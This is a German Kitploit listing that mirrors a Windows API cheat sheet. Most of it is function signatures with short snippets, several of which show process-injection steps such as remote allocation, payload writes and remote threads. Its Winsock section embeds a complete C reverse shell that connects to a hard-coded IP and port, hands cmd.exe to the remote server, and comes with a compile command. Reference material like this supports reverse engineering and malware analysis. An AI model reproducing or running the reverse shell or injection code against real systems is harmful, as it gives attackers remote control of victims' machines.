Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
windows-api-function-cheatsheets — Eine Referenz zu Windows-API-Funktionsaufrufen, einschließlich Funktionen für Dateioperationen, Prozessverwaltung, Speicherverwaltung, Thread-Verwaltung, Verwaltung dynamischer Linkbibliotheken (DLLs), Synchronisierung, Interprozesskommunikation, Unicode-Zeichenfolgenbearbeitung, Fehlerbehandlung, Winsock-Netzwerkoperationen und Registrierungsoperationen. | Kitploit
Tools/GitHubGitHub/7etsuo/windows-api-function-cheatsheets
Reverse EngineeringPost-ExploitationMalware-AnalyseBinäranalyseKuratierte RessourcenPayload-Entwicklung
GitHub7etsuo/windows-api-function-cheatsheets

windows-api-function-cheatsheets

Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
1.5k1695vor 1 JahrVon Kitploit geprüft

Über

Eine Referenz zu Windows-API-Funktionsaufrufen, einschließlich Funktionen für Dateioperationen, Prozessverwaltung, Speicherverwaltung, Thread-Verwaltung, Verwaltung dynamischer Linkbibliotheken (DLLs), Synchronisierung, Interprozesskommunikation, Unicode-Zeichenfolgenbearbeitung, Fehlerbehandlung, Winsock-Netzwerkoperationen und Registrierungsoperationen.

Teilen

API-Spickzettel

Windows-API-Funktions-Spickzettel

Kontakt

🌨️ Tetsuo: https://www.x.com/tetsuo

Inhaltsverzeichnis

  • Windows-API-Funktions-Spickzettel
    • Dateioperationen
    • Prozessverwaltung
    • Speicherverwaltung
    • Thread-Verwaltung
    • Dynamic-Link-Library-Verwaltung (DLL)
    • Synchronisierung
    • Interprozesskommunikation
    • Windows-Hooks
    • Kryptografie
    • Debugging
    • Winsock
    • Registrierungsoperationen
    • Fehlerbehandlung
    • Ressourcenverwaltung
    • Unicode-String-Funktionen
      • String-Länge
      • String-Kopieren
      • String-Verkettung
      • String-Vergleich
      • String-Suche
      • Zeichenklassifizierung und -konvertierung
    • Win32-Structs-Spickzettel
      • Allgemeine Structs
      • Win32-Sockets-Structs-Spickzettel (winsock.h)
      • Win32-Sockets-Structs-Spickzettel (winsock2.h)
      • Win32-Sockets-Structs-Spickzettel (ws2def.h)
  • Code-Injektionstechniken
    • 1. DLL-Injektion
    • 2. PE-Injektion
    • 3. Reflektive Injektion
    • 4. APC-Injektion
    • 5. Prozess-Aushöhlung (Prozessersetzung)
    • 6. AtomBombing
    • 7. Process Doppelgänging
    • 8. Process Herpaderping
    • 9. Hooking-Injektion
    • 10. Extra-Windows-Speicher-Injektion
    • 11. Propagate-Injektion
    • 12. Heap-Spray
    • 13. Thread-Ausführungs-Hijacking
    • 14. Module Stomping
    • 15. IAT-Hooking
    • 16. Inline-Hooking
    • 17. Debugger-Injektion
    • 18. COM-Hijacking
    • 19. Phantom-DLL-Aushöhlung
    • 20. PROPagate
    • 21. Early-Bird-Injektion
    • 22. Shim-basierte Injektion
    • 23. Mapping-Injektion
    • 24. KnownDlls-Cache-Vergiftung
  • Prozessaufzählung

Windows-API-Funktionsaufrufe

Dateioperationen

CreateFile```c HANDLE CreateFile( LPCTSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile ); // Opens an existing file or creates a new file.

root@kitploit:~
[ReadFile](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-readfile)```c
BOOL ReadFile(
  HANDLE hFile,
  LPVOID lpBuffer,
  DWORD nNumberOfBytesToRead,
  LPDWORD lpNumberOfBytesRead,
  LPOVERLAPPED lpOverlapped
); // Reads data from the specified file.

WriteFile```c BOOL WriteFile( HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped ); // Writes data to the specified file.

root@kitploit:~
[CloseHandle](https://docs.microsoft.com/en-us/windows/win32/api/handleapi/nf-handleapi-closehandle)```c
BOOL CloseHandle(
  HANDLE hObject
); // Closes an open handle.

Prozessverwaltung

OpenProcess```c HANDLE OpenProcess( [in] DWORD dwDesiredAccess, [in] BOOL bInheritHandle, [in] DWORD dwProcessId ); // Opens an existing local process object. e.g., try to open target process

root@kitploit:~
```c
hProc = OpenProcess( PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE, FALSE, (DWORD) pid);

CreateProcess```c HANDLE CreateProcess( LPCTSTR lpApplicationName, LPTSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCTSTR lpCurrentDirectory, LPSTARTUPINFO lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation ); // The CreateProcess function creates a new process that runs independently of the creating process. For simplicity, this relationship is called a parent-child relationship.

root@kitploit:~
```c
// Start the child process
// No module name (use command line), Command line, Process handle not inheritable, Thread handle not inheritable, Set handle inheritance to FALSE, No creation flags, Use parent's environment block, Use parent's starting directory, Pointer to STARTUPINFO structure, Pointer to PROCESS_INFORMATION structure
CreateProcess( NULL, argv[1], NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi); 

WinExec```c UINT WinExec( [in] LPCSTR lpCmdLine, [in] UINT uCmdShow ); // Runs the specified application.

root@kitploit:~
```c
result = WinExec(L"C:\\Windows\\System32\\cmd.exe", SW_SHOWNORMAL);

TerminateProcess```c BOOL TerminateProcess( HANDLE hProcess, UINT uExitCode ); // Terminates the specified process.

root@kitploit:~
[ExitWindowsEx](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-exitwindowsex)```c
BOOL ExitWindowsEx(
  [in] UINT  uFlags,
  [in] DWORD dwReason
); // Logs off the interactive user, shuts down the system, or shuts down and restarts the system.
root@kitploit:~
bResult = ExitWindowsEx(EWX_REBOOT, SHTDN_REASON_MAJOR_APPLICATION);

CreateToolhelp32Snapshot```c HANDLE CreateToolhelp32Snapshot( [in] DWORD dwFlags, [in] DWORD th32ProcessID ); // used to obtain information about processes and threads running on a Windows system.

root@kitploit:~
[Process32First](https://learn.microsoft.com/en-us/windows/win32/api/tlhelp32/nf-tlhelp32-process32first)```c
BOOL Process32First(
  [in]      HANDLE           hSnapshot,
  [in, out] LPPROCESSENTRY32 lppe
); // used to retrieve information about the first process encountered in a system snapshot, which is typically taken using the CreateToolhelp32Snapshot function.

Process32Next```c BOOL Process32Next( [in] HANDLE hSnapshot, [out] LPPROCESSENTRY32 lppe ); // used to retrieve information about the next process in a system snapshot after Process32First has been called. This function is typically used in a loop to enumerate all processes captured in a snapshot taken using the CreateToolhelp32Snapshot function.

root@kitploit:~
[WriteProcessMemory](https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-writeprocessmemory)```c
BOOL WriteProcessMemory(
  [in]  HANDLE  hProcess,
  [in]  LPVOID  lpBaseAddress,
  [in]  LPCVOID lpBuffer,
  [in]  SIZE_T  nSize,
  [out] SIZE_T  *lpNumberOfBytesWritten
); // Writes data to an area of memory in a specified process. The entire area to be written to must be accessible or the operation fails.
root@kitploit:~
WriteProcessMemory(hProc, pRemoteCode, (PVOID)payload, (SIZE_T)payload_len, (SIZE_T *)NULL); // pRemoteCode from VirtualAllocEx

ReadProcessMemory```c BOOL ReadProcessMemory( [in] HANDLE hProcess, [in] LPCVOID lpBaseAddress, [out] LPVOID lpBuffer, [in] SIZE_T nSize, [out] SIZE_T *lpNumberOfBytesRead ); // ReadProcessMemory copies the data in the specified address range from the address space of the specified process into the specified buffer of the current process.

root@kitploit:~
```c
bResult = ReadProcessMemory(pHandle, (void*)baseAddress, &address, sizeof(address), 0);

Speicherverwaltung

VirtualAlloc```c LPVOID VirtualAlloc( LPVOID lpAddress, SIZE_T dwSize, // Shellcode must be between 0x1 and 0x10000 bytes (page size) DWORD flAllocationType, // #define MEM_COMMIT 0x00001000 DWORD flProtect // #define PAGE_EXECUTE_READWRITE 0x00000040
); // Reserves, commits, or changes the state of a region of memory within the virtual address space of the calling process.

root@kitploit:~
[VirtualAllocEx](https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualallocex)```c
LPVOID VirtualAllocEx(
  [in]           HANDLE hProcess,
  [in, optional] LPVOID lpAddress,
  [in]           SIZE_T dwSize,
  [in]           DWORD  flAllocationType,
  [in]           DWORD  flProtect
); // Reserves, commits, or changes the state of a region of memory within the virtual address space of a specified process. The function initializes the memory it allocates to zero.
root@kitploit:~
pRemoteCode = VirtualAllocEx(hProc, NULL, payload_len, MEM_COMMIT, PAGE_EXECUTE_READ);

VirtualFree```c BOOL VirtualFree( LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType ); // Releases, decommits, or releases and decommits a region of memory within the virtual address space of the calling process.

root@kitploit:~
[VirtualProtect-Funktion (memoryapi.h)](https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualprotect)```c
BOOL VirtualProtect(
  LPVOID lpAddress,
  SIZE_T dwSize,
  DWORD  flNewProtect,
  PDWORD lpflOldProtect
); // Changes the protection on a region of committed pages in the virtual address space of the calling process.

RtlMoveMemory```c VOID RtlMoveMemory( Out VOID UNALIGNED *Destination, In const VOID UNALIGNED *Source, In SIZE_T Length ); // Copies the contents of a source memory block to a destination memory block, and supports overlapping source and destination memory blocks.

root@kitploit:~
### Thread-Verwaltung
[CreateThread](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createthread)```c
HANDLE CreateThread(
  [in, optional]  LPSECURITY_ATTRIBUTES   lpThreadAttributes,         // A pointer to a SECURITY_ATTRIBUTES structure that specifies a security descriptor for the new thread and determines whether child processes can inherit the returned handle.
  [in]            SIZE_T                  dwStackSize,                // The initial size of the stack, in bytes.
  [in]            LPTHREAD_START_ROUTINE  lpStartAddress,             // A pointer to the application-defined function of type LPTHREAD_START_ROUTINE
  [in, optional]  __drv_aliasesMem LPVOID lpParameter,                // A pointer to a variable to be passed to the thread function.
  [in]            DWORD                   dwCreationFlags,            // The flags that control the creation of the thread.
  [out, optional] LPDWORD                 lpThreadId                  // A pointer to a variable that receives the thread identifier. If this parameter is NULL, the thread identifier is not returned.
); // Creates a thread to execute within the virtual address space of the calling process.
root@kitploit:~
th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0); WaitForSingleObject(th, 0);

CreateRemoteThread```c HANDLE CreateRemoteThread( [in] HANDLE hProcess, [in] LPSECURITY_ATTRIBUTES lpThreadAttributes, [in] SIZE_T dwStackSize, [in] LPTHREAD_START_ROUTINE lpStartAddress, [in] LPVOID lpParameter, [in] DWORD dwCreationFlags, [out] LPDWORD lpThreadId ); // Creates a thread that runs in the virtual address space of another process.

root@kitploit:~
```c
hThread = CreateRemoteThread(hProc, NULL, 0, pRemoteCode, NULL, 0, NULL); // pRemoteCode from VirtualAllocEx filled by WriteProcessMemory

CreateRemoteThreadEx```c HANDLE CreateRemoteThreadEx( [in] HANDLE hProcess, [in, optional] LPSECURITY_ATTRIBUTES lpThreadAttributes, [in] SIZE_T dwStackSize, [in] LPTHREAD_START_ROUTINE lpStartAddress, [in, optional] LPVOID lpParameter, [in] DWORD dwCreationFlags, [in, optional] LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList, [out, optional] LPDWORD lpThreadId ); // Creates a thread that runs in the virtual address space of another process and optionally specifies extended attributes such as processor group affinity. // See InitializeProcThreadAttributeList

root@kitploit:~
```c
hThread = CreateRemoteThread(hProc, NULL, 0, pRemoteCode, NULL, 0, lpAttributeList, NULL); // pRemoteCode from VirtualAllocEx filled by WriteProcessMemory

ExitThread```c VOID ExitThread( DWORD dwExitCode ); // Terminates the calling thread and returns the exit code to the operating system.

root@kitploit:~
[GetExitCodeThread](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-getexitcodethread)```c
BOOL GetExitCodeThread(
  HANDLE hThread,
  LPDWORD lpExitCode
); // Retrieves the termination status of the specified thread.

ResumeThread```c DWORD ResumeThread( HANDLE hThread ); // Decrements a thread's suspend count. When the suspend count is decremented to zero, the execution of the thread is resumed.

root@kitploit:~
[SuspendThread](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-suspendthread)```c
DWORD SuspendThread(
  HANDLE hThread
); // Suspends the specified thread.

TerminateThread```c BOOL TerminateThread( HANDLE hThread, DWORD dwExitCode ); // Terminates the specified thread.

root@kitploit:~
[CloseHandle](https://docs.microsoft.com/en-us/windows/win32/api/handleapi/nf-handleapi-closehandle)```c
BOOL CloseHandle(
  HANDLE hObject
); // Closes an open handle.

Verwaltung von Dynamic-Link-Bibliotheken (DLL)

LoadLibrary```c HMODULE LoadLibrary( LPCTSTR lpFileName ); // Loads a dynamic-link library (DLL) module into the address space of the calling process.

root@kitploit:~
[LoadLibraryExA](https://learn.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibraryexa)```c
HMODULE LoadLibraryExA(
  [in] LPCSTR lpLibFileName,
       HANDLE hFile,
  [in] DWORD  dwFlags
); // Loads the specified module into the address space of the calling process, with additional options.
root@kitploit:~
HMODULE hModule = LoadLibraryExA("ws2_32.dll", NULL, LOAD_LIBRARY_SAFE_CURRENT_DIRS);

GetProcAddress```c FARPROC GetProcAddress( HMODULE hModule, LPCSTR lpProcName ); // Retrieves the address of an exported function or variable from the specified DLL.

root@kitploit:~
```c
pLoadLibrary = (PTHREAD_START_ROUTINE) GetProcAddress(GetModuleHandle("Kernel32.dll"), "LoadLibraryA");

FreeLibrary```c BOOL FreeLibrary( HMODULE hModule ); // Frees the loaded DLL module and, if necessary, decrements its reference count.

root@kitploit:~
### Synchronisation
[CreateMutex](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-createmutexa)```c
HANDLE CreateMutex(
  LPSECURITY_ATTRIBUTES lpMutexAttributes,
  BOOL bInitialOwner,
  LPCTSTR lpName
); // Creates a named or unnamed mutex object.

CreateSemaphore```c HANDLE CreateSemaphore( LPSECURITY_ATTRIBUTES lpSemaphoreAttributes, LONG lInitialCount, LONG lMaximumCount, LPCTSTR lpName ); // Creates a named or unnamed semaphore object.

root@kitploit:~
[ReleaseMutex](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-releasemutex)```c
BOOL ReleaseMutex(
  HANDLE hMutex
); // Releases ownership of the specified mutex object.

ReleaseSemaphore```c BOOL ReleaseSemaphore( HANDLE hSemaphore, LONG lReleaseCount, LPLONG lpPreviousCount ); // Increases the count of the specified semaphore object by a specified amount.

root@kitploit:~
[WaitForSingleObject](https://learn.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-waitforsingleobject)```c
DWORD WaitForSingleObject(
  [in] HANDLE hHandle,
  [in] DWORD  dwMilliseconds
); // Waits until the specified object is in the signaled state or the time-out interval elapses.
root@kitploit:~
WaitForSingleObject(hThread, 500);

Interprozesskommunikation

CreatePipe```c BOOL CreatePipe( PHANDLE hReadPipe, PHANDLE hWritePipe, LPSECURITY_ATTRIBUTES lpPipeAttributes, DWORD nSize ); // Creates an anonymous pipe and returns handles to the read and write ends of the pipe.

root@kitploit:~
[CreateNamedPipe](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-createnamedpipea)```c
HANDLE CreateNamedPipe(
  LPCTSTR lpName,
  DWORD dwOpenMode,
  DWORD dwPipeMode,
  DWORD nMaxInstances,
  DWORD nOutBufferSize,
  DWORD nInBufferSize,
  DWORD nDefaultTimeOut,
  LPSECURITY_ATTRIBUTES lpSecurityAttributes
); // Creates a named pipe and returns a handle for subsequent pipe operations.

ConnectNamedPipe```c BOOL ConnectNamedPipe( HANDLE hNamedPipe, LPOVERLAPPED lpOverlapped ); // Enables a named pipe server process to wait for a client process to connect to an instance of a named pipe.

root@kitploit:~
[DisconnectNamedPipe](https://docs.microsoft.com/en-us/windows/win32/api/namedpipeapi/nf-namedpipeapi-disconnectnamedpipe)```c
BOOL DisconnectNamedPipe(
  HANDLE hNamedPipe
); // Disconnects the server end of a named pipe instance from a client process.

CreateFileMapping```c HANDLE CreateFileMapping( HANDLE hFile, LPSECURITY_ATTRIBUTES lpFileMappingAttributes, DWORD flProtect, DWORD dwMaximumSizeHigh, DWORD dwMaximumSizeLow, LPCTSTR lpName ); // Creates or opens a named or unnamed file mapping object for a specified file.

root@kitploit:~
[MapViewOfFile](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-mapviewoffile)```c
LPVOID MapViewOfFile(
  HANDLE hFileMappingObject,
  DWORD dwDesiredAccess,
  DWORD dwFileOffsetHigh,
  DWORD dwFileOffsetLow,
  SIZE_T dwNumberOfBytesToMap
); // Maps a view of a file mapping into the address space of the calling process.

UnmapViewOfFile```c BOOL UnmapViewOfFile( LPCVOID lpBaseAddress ); // Unmaps a mapped view of a file from the calling process's address space.

root@kitploit:~
[CloseHandle](https://docs.microsoft.com/en-us/windows/win32/api/handleapi/nf-handleapi-closehandle)```c
BOOL CloseHandle(
  HANDLE hObject
); // Closes an open handle.

Windows Hooks

SetWindowsHookExA```c HHOOK SetWindowsHookExA( [in] int idHook, [in] HOOKPROC lpfn, [in] HINSTANCE hmod, [in] DWORD dwThreadId ); // Installs an application-defined hook procedure into a hook chain. You would install a hook procedure to monitor the system for certain types of events. These events are associated either with a specific thread or with all threads in the same desktop as the calling thread.

root@kitploit:~
[CallNextHookEx](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-callnexthookex)```c
LRESULT CallNextHookEx(
  [in, optional] HHOOK  hhk,
  [in]           int    nCode,
  [in]           WPARAM wParam,
  [in]           LPARAM lParam
); // Passes the hook information to the next hook procedure in the current hook chain. A hook procedure can call this function either before or after processing the hook information.

UnhookWindowsHookEx```c BOOL UnhookWindowsHookEx( [in] HHOOK hhk ); // Removes a hook procedure installed in a hook chain by the SetWindowsHookEx function.

root@kitploit:~
[GetAsyncKeyState](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getasynckeystate)```c
SHORT GetAsyncKeyState(
  [in] int vKey
); // Determines whether a key is up or down at the time the function is called, and whether the key was pressed after a previous call to GetAsyncKeyState.

GetKeyState```c SHORT GetKeyState( [in] int nVirtKey ); // Retrieves the status of the specified virtual key. The status specifies whether the key is up, down, or toggled (on, off—alternating each time the key is pressed).

root@kitploit:~
[GetKeyboardState](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getkeyboardstate)```c
BOOL GetKeyboardState(
  [out] PBYTE lpKeyState
); // Copies the status of the 256 virtual keys to the specified buffer.

Kryptographie

CryptBinaryToStringA```c BOOL CryptBinaryToStringA( [in] const BYTE *pbBinary, [in] DWORD cbBinary, [in] DWORD dwFlags, [out, optional] LPSTR pszString, [in, out] DWORD *pcchString ); // The CryptBinaryToString function converts an array of bytes into a formatted string.

root@kitploit:~
[CryptDecrypt](https://learn.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptdecrypt)```c
BOOL CryptDecrypt(
  [in]      HCRYPTKEY  hKey,
  [in]      HCRYPTHASH hHash,
  [in]      BOOL       Final,
  [in]      DWORD      dwFlags,
  [in, out] BYTE       *pbData,
  [in, out] DWORD      *pdwDataLen
); // The CryptDecrypt function decrypts data previously encrypted by using the CryptEncrypt function.

CryptEncrypt```c BOOL CryptEncrypt( [in] HCRYPTKEY hKey, [in] HCRYPTHASH hHash, [in] BOOL Final, [in] DWORD dwFlags, [in, out] BYTE *pbData, [in, out] DWORD *pdwDataLen, [in] DWORD dwBufLen ); // The CryptEncrypt function encrypts data. The algorithm used to encrypt the data is designated by the key held by the CSP module and is referenced by the hKey parameter.

root@kitploit:~
[CryptDecryptMessage](https://learn.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptdecryptmessage)```c
BOOL CryptDecryptMessage(
  [in]                PCRYPT_DECRYPT_MESSAGE_PARA pDecryptPara,
  [in]                const BYTE                  *pbEncryptedBlob,
  [in]                DWORD                       cbEncryptedBlob,
  [out, optional]     BYTE                        *pbDecrypted,
  [in, out, optional] DWORD                       *pcbDecrypted,
  [out, optional]     PCCERT_CONTEXT              *ppXchgCert
); // The CryptDecryptMessage function decodes and decrypts a message.

CryptEncryptMessage```c BOOL CryptEncryptMessage( [in] PCRYPT_ENCRYPT_MESSAGE_PARA pEncryptPara, [in] DWORD cRecipientCert, [in] PCCERT_CONTEXT [] rgpRecipientCert, [in] const BYTE *pbToBeEncrypted, [in] DWORD cbToBeEncrypted, [out] BYTE *pbEncryptedBlob, [in, out] DWORD *pcbEncryptedBlob ); // The CryptEncryptMessage function encrypts and encodes a message.

root@kitploit:~
### Debugging
[IsDebuggerPresent](https://learn.microsoft.com/en-us/windows/win32/api/debugapi/nf-debugapi-isdebuggerpresent)```c
BOOL IsDebuggerPresent(); // Determines whether the calling process is being debugged by a user-mode debugger.

CheckRemoteDebuggerPresent```c BOOL CheckRemoteDebuggerPresent( [in] HANDLE hProcess, [in, out] PBOOL pbDebuggerPresent ); // Determines whether the specified process is being debugged.

root@kitploit:~
[OutputDebugStringA](https://learn.microsoft.com/en-us/windows/win32/api/debugapi/nf-debugapi-outputdebugstringa)```c
void OutputDebugStringA(
  [in, optional] LPCSTR lpOutputString
); // Sends a string to the debugger for display.

Winsock```c

/*** Windows Reverse Shell *

  • ██████ ███▄ █ ▒█████ █ █░ ▄████▄ ██▀███ ▄▄▄ ██████ ██░ ██
  • ▒██ ▒ ██ ▀█ █ ▒██▒ ██▒▓█░ █ ░█░▒██▀ ▀█ ▓██ ▒ ██▒▒████▄ ▒██ ▒ ▓██░ ██▒
  • ░ ▓██▄ ▓██ ▀█ ██▒▒██░ ██▒▒█░ █ ░█ ▒▓█ ▄ ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▓██▄ ▒██▀▀██░
  • ▒ ██▒▓██▒ ▐▌██▒▒██ ██░░█░ █ ░█ ▒▓▓▄ ▄██▒▒██▀▀█▄ ░██▄▄▄▄██ ▒ ██▒░▓█ ░██
  • ▒██████▒▒▒██░ ▓██░░ ████▓▒░░░██▒██▓ ▒ ▓███▀ ░░██▓ ▒██▒ ▓█ ▓██▒▒██████▒▒░▓█▒░██▓
  • ▒ ▒▓▒ ▒ ░░ ▒░ ▒ ▒ ░ ▒░▒░▒░ ░ ▓░▒ ▒ ░ ░▒ ▒ ░░ ▒▓ ░▒▓░ ▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒ ░░▒░▒
  • ░ ░▒ ░ ░░ ░░ ░ ▒░ ░ ▒ ▒░ ▒ ░ ░ ░ ▒ ░▒ ░ ▒░ ▒ ▒▒ ░░ ░▒ ░ ░ ▒ ░▒░ ░
  • ░ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░
  • root@kitploit:~
      ░           ░     ░ ░      ░    ░ ░         ░           ░  ░      ░   ░  ░  ░
    
  • root@kitploit:~
                                  Written by: [email protected] (snowcra5h) 2023
    
  • This program establishes a reverse shell via the Winsock2 library. It is
  • designed to establish a connection to a specified remote server, and execute commands
  • received from the server on the local machine, giving the server
  • control over the local machine.
  • Compile command (using MinGW on Wine):
  • wine gcc.exe windows.c -o windows.exe -lws2_32
  • This code is intended for educational and legitimate penetration testing purposes only.
  • Please use responsibly and ethically.

*/

#include <winsock2.h> #include <ws2tcpip.h> #include <stdio.h> #include <windows.h> #include <process.h>

const char* const PORT = "1337"; const char* const IP = "10.37.129.2";

typedef struct { HANDLE hPipeRead; HANDLE hPipeWrite; SOCKET sock; } ThreadParams;

DWORD WINAPI OutputThreadFunc(LPVOID data); DWORD WINAPI InputThreadFunc(LPVOID data); void CleanUp(HANDLE hInputWrite, HANDLE hInputRead, HANDLE hOutputWrite, HANDLE hOutputRead, PROCESS_INFORMATION processInfo, addrinfo* result, SOCKET sock);

int main(int argc, char** argv) { WSADATA wsaData; int err = WSAStartup(MAKEWORD(2, 2), &wsaData); if (err != 0) { fprintf(stderr, "WSAStartup failed: %d\n", err); return 1; }

root@kitploit:~
SOCKET sock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, WSA_FLAG_OVERLAPPED);
if (sock == INVALID_SOCKET) {
    fprintf(stderr, "Socket function failed with error = %d\n", WSAGetLastError());
    WSACleanup();
    return 1;
}

struct addrinfo hints = { 0 };
hints.ai_family = AF_INET;
hints.ai_socktype = SOCK_STREAM;
struct addrinfo* result;
err = getaddrinfo(IP, PORT, &hints, &result);
if (err != 0) {
    fprintf(stderr, "Failed to get address info: %d\n", err);
    CleanUp(NULL, NULL, NULL, NULL, { 0 }, result, sock);
    return 1;
}

if (WSAConnect(sock, result->ai_addr, (int)result->ai_addrlen, NULL, NULL, NULL, NULL) == SOCKET_ERROR) {
    fprintf(stderr, "Failed to connect.\n");
    CleanUp(NULL, NULL, NULL, NULL, { 0 }, result, sock);
    return 1;
}

SECURITY_ATTRIBUTES sa = { sizeof(SECURITY_ATTRIBUTES), NULL, TRUE };
HANDLE hInputWrite, hOutputRead, hInputRead, hOutputWrite;
if (!CreatePipe(&hOutputRead, &hOutputWrite, &sa, 0) || !CreatePipe(&hInputRead, &hInputWrite, &sa, 0)) {
    fprintf(stderr, "Failed to create pipe.\n");
    CleanUp(NULL, NULL, NULL, NULL, { 0 }, result, sock);
    return 1;
}

STARTUPINFO startupInfo = { 0 };
startupInfo.cb = sizeof(startupInfo);
startupInfo.dwFlags = STARTF_USESTDHANDLES;
startupInfo.hStdInput = hInputRead;
startupInfo.hStdOutput = hOutputWrite;
startupInfo.hStdError = hOutputWrite;
PROCESS_INFORMATION processInfo;

WCHAR cmd[] = L"cmd.exe /k";
if (!CreateProcess(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &startupInfo, &processInfo)) {
    fprintf(stderr, "Failed to create process.\n");
    CleanUp(hInputWrite, hInputRead, hOutputWrite, hOutputRead, processInfo, result, sock);
    return 1;
}

CloseHandle(hInputRead);
CloseHandle(hOutputWrite);
CloseHandle(processInfo.hThread);
ThreadParams outputParams = { hOutputRead, NULL, sock };
ThreadParams inputParams = { NULL, hInputWrite, sock };
HANDLE hThread[2];
hThread[0] = CreateThread(NULL, 0, OutputThreadFunc, &outputParams, 0, NULL);
hThread[1] = CreateThread(NULL, 0, InputThreadFunc, &inputParams, 0, NULL);

WaitForMultipleObjects(2, hThread, TRUE, INFINITE);
CleanUp(hInputWrite, NULL, NULL, hOutputRead, processInfo, result, sock);
return 0;

}

void CleanUp(HANDLE hInputWrite, HANDLE hInputRead, HANDLE hOutputWrite, HANDLE hOutputRead, PROCESS_INFORMATION processInfo, addrinfo* result, SOCKET sock) { if (hInputWrite != NULL) CloseHandle(hInputWrite); if (hInputRead != NULL) CloseHandle(hInputRead); if (hOutputWrite != NULL) CloseHandle(hOutputWrite); if (hOutputRead != NULL) CloseHandle(hOutputRead); if (processInfo.hProcess != NULL) CloseHandle(processInfo.hProcess); if (processInfo.hThread != NULL) CloseHandle(processInfo.hThread); if (result != NULL) freeaddrinfo(result); if (sock != NULL) closesocket(sock); WSACleanup(); }

DWORD WINAPI OutputThreadFunc(LPVOID data) { ThreadParams* params = (ThreadParams*)data; char buffer[4096]; DWORD bytesRead; while (ReadFile(params->hPipeRead, buffer, sizeof(buffer) - 1, &bytesRead, NULL)) { buffer[bytesRead] = '\0'; send(params->sock, buffer, bytesRead, 0); } return 0; }

DWORD WINAPI InputThreadFunc(LPVOID data) { ThreadParams* params = (ThreadParams*)data; char buffer[4096]; int bytesRead; while ((bytesRead = recv(params->sock, buffer, sizeof(buffer) - 1, 0)) > 0) { DWORD bytesWritten; WriteFile(params->hPipeWrite, buffer, bytesRead, &bytesWritten, NULL); } return 0; }

root@kitploit:~
[WSAStartup](https://docs.microsoft.com/en-us/windows/win32/api/winsock/nf-winsock-wsastartup)```c
int WSAStartup(
    WORD wVersionRequired, 
    LPWSADATA lpWSAData
); // Initializes the Winsock library for an application. Must be called before any other Winsock functions.

WSAConnect```c int WSAConnect( SOCKET s, // Descriptor identifying a socket. const struct sockaddr* name, // Pointer to the sockaddr structure for the connection target. int namelen, // Length of the sockaddr structure. LPWSABUF lpCallerData, // Pointer to user data to be transferred during connection. LPWSABUF lpCalleeData, // Pointer to user data transferred back during connection. LPQOS lpSQOS, // Pointer to flow specs for socket s, one for each direction. LPQOS lpGQOS // Pointer to flow specs for the socket group. ); // Establishes a connection to another socket application.This function is similar to connect, but allows for more control over the connection process.

root@kitploit:~
[WSASend](https://learn.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-wsasend)```c
int WSASend(
    SOCKET s, // Descriptor identifying a connected socket.
    LPWSABUF lpBuffers, // Array of buffers for data to be sent.
    DWORD dwBufferCount, // Number of buffers in the lpBuffers array.
    LPDWORD lpNumberOfBytesSent, // Pointer to the number of bytes sent by this function call.
    DWORD dwFlags, // Flags to modify the behavior of the function call.
